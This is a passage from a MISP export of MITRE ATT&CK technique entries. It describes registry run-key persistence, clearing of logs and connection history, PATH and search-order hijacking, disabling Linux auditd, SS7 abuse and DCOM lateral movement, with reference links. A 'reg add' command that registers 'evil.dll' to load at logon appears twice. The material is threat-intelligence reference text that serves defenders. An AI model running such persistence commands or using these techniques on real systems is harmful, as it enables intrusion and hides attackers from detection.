  • <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce</code>

  • <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run</code>

  • <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce</code>

Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx</code> is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency.(Citation: Microsoft Run Key) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: <code>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"</code> (Citation: Oddvar Moe RunOnceEx Mar 2018)

Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is <code>C:\Users\\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup</code>. The startup folder path for all users is <code>C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp</code>.

The following Registry keys can be used to set startup folder items for persistence:

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code>

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code>

  • <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code>

  • <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code>

The following Registry keys can control automatic startup of services during boot:

  • <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</code>

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</code>

  • <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices</code>

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices</code>

Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:

  • <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</code>

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</code>

Programs listed in the load value of the registry key <code>HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows</code> run automatically for the currently logged-on user.

By default, the multistring <code>BootExecute</code> value of the registry key <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager</code> is set to <code>autocheck autochk *</code>. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.

Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.

The tag is: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"

Table 5351. Table References

Links

http://msdn.microsoft.com/en-us/library/aa376977

https://attack.mitre.org/techniques/T1547/001

https://blog.malwarebytes.com/cybercrime/2013/10/hiding-in-plain-sight/

https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry

https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/

https://technet.microsoft.com/en-us/sysinternals/bb963902

Clear Linux or Mac System Logs - T1070.002

Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the <code>/var/log/</code> directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)

  • <code>/var/log/messages:</code>: General and system-related messages

  • <code>/var/log/secure</code> or <code>/var/log/auth.log</code>: Authentication logs

  • <code>/var/log/utmp</code> or <code>/var/log/wtmp</code>: Login records

  • <code>/var/log/kern.log</code>: Kernel logs

  • <code>/var/log/cron.log</code>: Crond logs

  • <code>/var/log/maillog</code>: Mail server logs

  • <code>/var/log/httpd/</code>: Web server access and error logs

The tag is: misp-galaxy:mitre-attack-pattern="Clear Linux or Mac System Logs - T1070.002"

Table 5352. Table References

Links

https://attack.mitre.org/techniques/T1070/002

https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/

Clear Network Connection History and Configurations - T1070.007

Adversaries may clear or remove evidence of malicious network connections in order to clean up traces of their operations. Configuration settings as well as various artifacts that highlight connection history may be created on a system and/or in application logs from behaviors that require network connections, such as [Remote Services](https://attack.mitre.org/techniques/T1021) or [External Remote Services](https://attack.mitre.org/techniques/T1133). Defenders may use these artifacts to monitor or otherwise analyze network connections created by adversaries.

Network connection history may be stored in various locations. For example, RDP connection history may be stored in Windows Registry values under (Citation: Microsoft RDP Removal):

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default</code>

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers</code>

Windows may also store information about recent RDP connections in files such as <code>C:\Users\\%username%\Documents\Default.rdp</code> and C:\Users\%username%\AppData\Local\Microsoft\Terminal Server Client\Cache\.(Citation: Moran RDPieces) Similarly, macOS and Linux hosts may store information highlighting connection history in system logs (such as those stored in /Library/Logs and/or /var/log/).(Citation: Apple Culprit Access)(Citation: FreeDesktop Journal)(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)

Malicious network connections may also require changes to third-party applications or network configuration settings, such as [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004) or tampering to enable [Proxy](https://attack.mitre.org/techniques/T1090). Adversaries may delete or modify this data to conceal indicators and/or impede defensive analysis.

The tag is: misp-galaxy:mitre-attack-pattern="Clear Network Connection History and Configurations - T1070.007"

Table 5353. Table References

Links

https://attack.mitre.org/techniques/T1070/007

https://discussions.apple.com/thread/3991574

https://docs.microsoft.com/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer

https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins

https://www.freedesktop.org/software/systemd/man/systemd-journald.service.html

https://www.osdfcon.org/presentations/2020/Brian-Moran_Putting-Together-the-RDPieces.pdf

Compromise Software Dependencies and Development Tools - T1195.001

Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency.(Citation: Trendmicro NPM Compromise)

Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.

The tag is: misp-galaxy:mitre-attack-pattern="Compromise Software Dependencies and Development Tools - T1195.001"

Table 5354. Table References

Links

https://attack.mitre.org/techniques/T1195/001

https://www.trendmicro.com/vinfo/dk/security/news/cybercrime-and-digital-threats/hacker-infects-node-js-package-to-steal-from-bitcoin-wallets

Windows File and Directory Permissions Modification - T1222.001

Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).

Windows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).(Citation: Microsoft DACL May 2018) Similar to a standard ACL, DACLs identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied.(Citation: Microsoft Access Control Lists May 2018)

Adversaries can interact with the DACLs using built-in Windows commands, such as icacls, cacls, takeown, and attrib, which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://attack.mitre.org/techniques/T1059/001) provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).

The tag is: misp-galaxy:mitre-attack-pattern="Windows File and Directory Permissions Modification - T1222.001"

Table 5355. Table References

Links

https://attack.mitre.org/techniques/T1222/001

https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists

https://docs.microsoft.com/windows/desktop/secauthz/dacls-and-aces

https://www.eventtracker.com/tech-articles/monitoring-file-permission-changes-windows-security-log/

https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110

https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100

Compromise Software Dependencies and Development Tools - T1474.001

Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency.(Citation: Grace-Advertisement)

The tag is: misp-galaxy:mitre-attack-pattern="Compromise Software Dependencies and Development Tools - T1474.001"

Table 5356. Table References

Links

https://attack.mitre.org/techniques/T1474/001

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-6.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-0.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-10.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-15.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-3.html

https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-9.html

https://www.csc2.ncsu.edu/faculty/xjiang4/pubs/WISEC12_ADRISK.pdf

Path Interception by PATH Environment Variable - T1574.007

Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. The PATH environment variable contains a list of directories (User and System) that the OS searches sequentially through in search of the binary that was called from a script or the command line.

Adversaries can place a malicious program in an earlier entry in the list of directories stored in the PATH environment variable, resulting in the operating system executing the malicious binary rather than the legitimate binary when it searches sequentially through that PATH listing.

For example, on Windows if an adversary places a malicious program named "net.exe" in C:\example path, which by default precedes C:\Windows\system32\net.exe in the PATH environment variable, when "net" is executed from the command-line the C:\example path will be called instead of the system’s legitimate executable at C:\Windows\system32\net.exe. Some methods of executing a program rely on the PATH environment variable to determine the locations that are searched when the path for the program is not given, such as executing programs from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: ExpressVPN PATH env Windows 2021)

Adversaries may also directly modify the $PATH variable specifying the directories to be searched. An adversary can modify the $PATH variable to point to a directory they have write access. When a program using the $PATH variable is called, the OS searches the specified directory and executes the malicious binary. On macOS, this can also be performed through modifying the $HOME variable. These variables can be modified using the command-line, launchctl, [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or modifying the /etc/paths.d folder contents.(Citation: uptycs Fake POC linux malware 2023)(Citation: nixCraft macOS PATH variables)(Citation: Elastic Rules macOS launchctl 2022)

The tag is: misp-galaxy:mitre-attack-pattern="Path Interception by PATH Environment Variable - T1574.007"

Table 5357. Table References

Links

https://attack.mitre.org/techniques/T1574/007

https://www.cyberciti.biz/faq/appleosx-bash-unix-change-set-path-environment-variable/

https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-4-modification-of-environment-variable-via-launchctl.html

https://www.expressvpn.com/blog/cybersecurity-lessons-a-path-vulnerability-in-windows/

https://www.uptycs.com/blog/new-poc-exploit-backdoor-malware

Path Interception by Search Order Hijacking - T1574.008

Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.

Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program’s directory.

For example, "example.exe" runs "cmd.exe" with the command-line argument <code>net user</code>. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then <code>cmd.exe /C net user</code> will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)

Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).

The tag is: misp-galaxy:mitre-attack-pattern="Path Interception by Search Order Hijacking - T1574.008"

Table 5358. Table References

Links

http://msdn.microsoft.com/en-us/library/ms682425

http://msdn.microsoft.com/en-us/library/ms687393

https://attack.mitre.org/techniques/T1574/008

https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120

https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN

Disable or Modify Linux Audit System - T1562.012

Adversaries may disable or modify the Linux audit system to hide malicious activity and avoid detection. Linux admins use the Linux Audit system to track security-relevant information on a system. The Linux Audit system operates at the kernel-level and maintains event logs on application and system activity such as process, network, file, and login events based on pre-configured rules.

Often referred to as auditd, this is the name of the daemon used to write events to disk and is governed by the parameters set in the audit.conf configuration file. Two primary ways to configure the log generation rules are through the command line auditctl utility and the file /etc/audit/audit.rules, containing a sequence of auditctl commands loaded at boot time.(Citation: Red Hat System Auditing)(Citation: IzyKnows auditd threat detection 2022)

With root privileges, adversaries may be able to ensure their activity is not logged through disabling the Audit system service, editing the configuration/rule files, or by hooking the Audit system library functions. Using the command line, adversaries can disable the Audit system service through killing processes associated with auditd daemon or use systemctl to stop the Audit service. Adversaries can also hook Audit system functions to disable logging or modify the rules contained in the /etc/audit/audit.rules or audit.conf files to ignore malicious activity.(Citation: Trustwave Honeypot SkidMap 2023)(Citation: ESET Ebury Feb 2014)

The tag is: misp-galaxy:mitre-attack-pattern="Disable or Modify Linux Audit System - T1562.012"

Table 5359. Table References

Links

https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing

https://attack.mitre.org/techniques/T1562/012

https://izyknows.medium.com/linux-auditd-for-threat-detection-d06c8b941505

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/honeypot-recon-new-variant-of-skidmap-targeting-redis/

https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/

Registry Run Keys / Startup Folder - T1060

Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account’s associated permissions level.

Placing a program within a startup folder will cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in.

The startup folder path for the current user is: * <code>C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup</code> The startup folder path for all users is: * <code>C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp</code>

The following run keys are created by default on Windows systems: * <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run</code> * <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce</code> * <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run</code> * <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce</code>

The <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx</code> is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: <code>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"</code> (Citation: Oddvar Moe RunOnceEx Mar 2018)

The following Registry keys can be used to set startup folder items for persistence: * <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code> * <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code> * <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code> * <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code>

The following Registry keys can control automatic startup of services during boot: * <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</code> * <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</code> * <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices</code> * <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices</code>

Using policy settings to specify startup programs creates corresponding values in either of two Registry keys: * <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</code> * <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</code>

The Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit</code> and <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell</code> subkeys can automatically launch programs.

Programs listed in the load value of the registry key <code>HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows</code> run when any user logs on.

By default, the multistring BootExecute value of the registry key <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager</code> is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.

Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.

The tag is: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1060"

Table 5360. Table References

Links

http://msdn.microsoft.com/en-us/library/aa376977

https://attack.mitre.org/techniques/T1060

https://capec.mitre.org/data/definitions/270.html

https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/

https://support.microsoft.com/help/310593/description-of-the-runonceex-registry-key

https://technet.microsoft.com/en-us/sysinternals/bb963902

Exploit SS7 to Redirect Phone Calls/SMS - T1449

An adversary could exploit signaling system vulnerabilities to redirect calls or text messages (SMS) to a phone number under the attacker’s control. The adversary could then act as an adversary-in-the-middle to intercept or manipulate the communication. (Citation: Engel-SS7) (Citation: Engel-SS7-2008) (Citation: 3GPP-Security) (Citation: Positive-SS7) (Citation: CSRIC5-WG10-FinalReport) Interception of SMS messages could enable adversaries to obtain authentication codes used for multi-factor authentication(Citation: TheRegister-SS7).

The tag is: misp-galaxy:mitre-attack-pattern="Exploit SS7 to Redirect Phone Calls/SMS - T1449"

Table 5361. Table References

Links

http://www.3gpp.org/ftp/tsg_sa/wg3_security/_specs/33900-120.pdf

https://attack.mitre.org/techniques/T1449

https://berlin.ccc.de/tobias/31c3-ss7-locate-track-manipulate.pdf

https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-37.html

https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf

https://www.ptsecurity.com/upload/ptcom/PT-SS7-AD-Data-Sheet-eng.pdf

https://www.theregister.co.uk/2017/05/03/hackers_fire_up_ss7_flaw/

https://www.youtube.com/watch?v=q0n5ySqbfdI

Assess security posture of physical locations - T1302

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1302).

Physical access may be required for certain types of adversarial actions. (Citation: CyberPhysicalAssessment) (Citation: CriticalInfrastructureAssessment)

The tag is: misp-galaxy:mitre-attack-pattern="Assess security posture of physical locations - T1302"

Table 5362. Table References

Links

https://attack.mitre.org/techniques/T1302

Determine domain and IP address space - T1250

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1250).

Domain Names are the human readable names used to represent one or more IP addresses. IP addresses are the unique identifier of computing devices on a network. Both pieces of information are valuable to an adversary who is looking to understand the structure of a network. (Citation: RSA-APTRecon)

The tag is: misp-galaxy:mitre-attack-pattern="Determine domain and IP address space - T1250"

Table 5363. Table References

Links

https://attack.mitre.org/techniques/T1250

Research visibility gap of security vendors - T1290

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1290).

If an adversary can identify which security tools a victim is using they may be able to identify ways around those tools. (Citation: CrowdStrike Putter Panda)

The tag is: misp-galaxy:mitre-attack-pattern="Research visibility gap of security vendors - T1290"

Table 5364. Table References

Links

http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf

https://attack.mitre.org/techniques/T1290

Exploit SS7 to Track Device Location - T1450

An adversary could exploit signaling system vulnerabilities to track the location of mobile devices. (Citation: Engel-SS7) (Citation: Engel-SS7-2008) (Citation: 3GPP-Security) (Citation: Positive-SS7) (Citation: CSRIC5-WG10-FinalReport)

The tag is: misp-galaxy:mitre-attack-pattern="Exploit SS7 to Track Device Location - T1450"

Table 5365. Table References

Links

http://www.3gpp.org/ftp/tsg_sa/wg3_security/_specs/33900-120.pdf

https://attack.mitre.org/techniques/T1450

https://berlin.ccc.de/tobias/31c3-ss7-locate-track-manipulate.pdf

https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-38.html

https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf

https://www.ptsecurity.com/upload/ptcom/PT-SS7-AD-Data-Sheet-eng.pdf

https://www.youtube.com/watch?v=q0n5ySqbfdI

Access Sensitive Data in Device Logs - T1413

On versions of Android prior to 4.1, an adversary may use a malicious application that holds the READ_LOGS permission to obtain private keys, passwords, other credentials, or other sensitive data stored in the device’s system log. On Android 4.1 and later, an adversary would need to attempt to perform an operating system privilege escalation attack to be able to access the log.

The tag is: misp-galaxy:mitre-attack-pattern="Access Sensitive Data in Device Logs - T1413"

Table 5366. Table References

Links

https://attack.mitre.org/techniques/T1413

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-3.html

Stolen Developer Credentials or Signing Keys - T1441

An adversary could steal developer account credentials on an app store and/or signing keys to publish malicious updates to existing Android or iOS apps, or to abuse the developer’s identity and reputation to publish new malicious applications. For example, Infoworld describes this technique and suggests mitigations in (Citation: Infoworld-Appstore).

Detection: Developers can regularly scan (or have a third party scan on their behalf) the app stores for presence of unauthorized apps that were submitted using the developer’s identity.

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="Stolen Developer Credentials or Signing Keys - T1441"

Stolen Developer Credentials or Signing Keys - T1441 has relationships with:

  • revoked-by: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"

Table 5367. Table References

Links

https://attack.mitre.org/techniques/T1441

Component Object Model and Distributed COM - T1175

This technique has been deprecated. Please use [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) and [Component Object Model](https://attack.mitre.org/techniques/T1559/001).

Adversaries may use the Windows Component Object Model (COM) and Distributed Component Object Model (DCOM) for local code execution or to execute on remote systems as part of lateral movement.

COM is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) DCOM is transparent middleware that extends the functionality of Component Object Model (COM) (Citation: Microsoft COM) beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)

Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry. (Citation: Microsoft COM ACL)(Citation: Microsoft Process Wide Com Keys)(Citation: Microsoft System Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.

Adversaries may abuse COM for local command and/or payload execution. Various COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and VBScript.(Citation: Microsoft COM) Specific COM objects also exists to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors such as Privilege Escalation and Persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)

Adversaries may use DCOM for lateral movement. Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications (Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents (Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1173) (DDE) execution directly through a COM created instance of a Microsoft Office application (Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document.

The tag is: misp-galaxy:mitre-attack-pattern="Component Object Model and Distributed COM - T1175"

Table 5368. Table References

Links

https://attack.mitre.org/techniques/T1175

https://docs.microsoft.com/en-us/windows/desktop/com/dcom-security-enhancements-in-windows-xp-service-pack-2-and-windows-server-2003-service-pack-1

https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/

https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/

https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/

https://enigma0x3.net/2017/11/16/lateral-movement-using-outlooks-createobject-method-and-dotnettojscript/

https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html

https://msdn.microsoft.com/en-us/library/windows/desktop/ms687317(v=vs.85).aspx

https://msdn.microsoft.com/en-us/library/windows/desktop/ms694331(v=vs.85).aspx

https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx

https://www.cybereason.com/blog/leveraging-excel-dde-for-lateral-movement-via-dcom

https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html

Develop social network persona digital footprint - T1342

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1342).

Both newly built personas and pre-compromised personas may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos. (Citation: NEWSCASTER2014) (Citation: BlackHatRobinSage) (Citation: RobinSageInterview)

The tag is: misp-galaxy:mitre-attack-pattern="Develop social network persona digital footprint - T1342"

Table 5369. Table References

Links

http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf

https://attack.mitre.org/techniques/T1342

https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation

Assess vulnerability of 3rd party vendors - T1298

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1298).

Once a 3rd party vendor has been identified as being of interest it can be probed for vulnerabilities just like the main target would be. (Citation: Zetter2015Threats) (Citation: WSJTargetBreach)

The tag is: misp-galaxy:mitre-attack-pattern="Assess vulnerability of 3rd party vendors - T1298"

Table 5370. Table References

Links

https://attack.mitre.org/techniques/T1298

Manipulate App Store Rankings or Ratings - T1452

An adversary could use access to a compromised device’s credentials to attempt to manipulate app store rankings or ratings by triggering application downloads or posting fake reviews of applications. This technique likely requires privileged access (a rooted or jailbroken device).

The tag is: misp-galaxy:mitre-attack-pattern="Manipulate App Store Rankings or Ratings - T1452"

Table 5371. Table References

Links

https://attack.mitre.org/techniques/T1452

Acquire OSINT data sets and information - T1247

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1247).

Open source intelligence (OSINT) is intelligence gathered from publicly available sources. This can include both information gathered on-line, such as from search engines, as well as in the physical world. (Citation: RSA-APTRecon)

The tag is: misp-galaxy:mitre-attack-pattern="Acquire OSINT data sets and information - T1247"

Acquire OSINT data sets and information - T1247 has relationships with:

